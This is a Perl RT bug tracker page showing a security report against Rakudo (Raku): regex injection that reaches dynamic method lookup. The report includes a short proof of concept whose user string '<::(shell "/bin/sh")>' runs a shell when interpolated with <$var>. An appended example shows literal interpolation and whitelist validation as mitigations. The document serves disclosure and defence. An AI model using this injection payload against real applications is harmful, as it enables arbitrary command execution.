Report information
Id: 131079
Status: new
Priority: 0/
Queue: perl6

Owner: Nobody
Requestors: lloyd.fourn [at] gmail.com
Cc:
AdminCc:

Severity: (no value)
Tag: (no value)
Platform: (no value)
Patch Status: (no value)
VM: (no value)



To: "rakudobug [...] perl.org" <rakudobug [...] perl.org>
From: Lloyd Fournier <lloyd.fourn [...] gmail.com>
Subject: [SEC] regex injection allows arbitrary execution using dynamic method lookup
Date: Thu, 30 Mar 2017 12:40:27 +0000
my $regex-from-user = '{ shell "/bin/sh" }';
try say "foo" ~~ /<$regex-from-user>/; # won't work
$regex-from-user = '<::(shell "/bin/sh")>';
try say "foo" ~~ /<$regex-from-user>/; # you got owned
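Added example (not part of the report above and not Rakudo project code): the distinction the report hinges on is that `/$var/` interpolates a scalar as a literal string, while `/<$var>/` interprets the string as regex source, which is what lets `<::(...)>` reach dynamic lookup. The subs `match-literal` and `match-validated-pattern` and the character whitelist they use are hypothetical; adjust the whitelist to whatever pattern syntax an application genuinely needs.

```raku
# Safe handling of user-supplied text in a Raku regex (added example).

# Literal interpolation: the contents of $needle are matched character by
# character, never parsed as regex syntax, so regex metacharacters and
# <::(...)> are inert.
sub match-literal(Str $haystack, Str $needle --> Bool) {
    so $haystack ~~ /$needle/;
}

# If user input really must act as a pattern, restrict it to a small
# whitelist before handing it to <$pattern>. This whitelist (alphanumerics
# plus . * + ?) is a hypothetical policy; '<' and '(' are not allowed, so
# the <::(...)> form from the report cannot get through.
sub match-validated-pattern(Str $haystack, Str $pattern --> Bool) {
    die "pattern contains disallowed characters: $pattern"
        unless $pattern ~~ /^ [ <alnum> | <[ . * + ? ]> ]+ $/;
    so $haystack ~~ /<$pattern>/;
}

# Constructed inputs for demonstration.
my $regex-from-user = '<::(shell "/bin/sh")>';

say match-literal('foo', $regex-from-user);                  # False, nothing executes
say match-literal('x<::(shell "/bin/sh")>y', $regex-from-user); # True, matched as text

say match-validated-pattern('foo', 'fo+');                   # True
try match-validated-pattern('foo', $regex-from-user);
say $! ?? "rejected: $!" !! "accepted";                      # rejected: pattern contains disallowed characters: ...
```

The literal form is the right default whenever the user is supplying a search term rather than a pattern; the whitelist path exists only for cases where some pattern syntax is a requirement, and it should stay as narrow as the feature allows.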




This service is sponsored and maintained by Best Practical Solutions and runs on Perl.org infrastructure.

For issues related to this RT instance (aka "perlbug"), please contact perlbug-admin at perl.org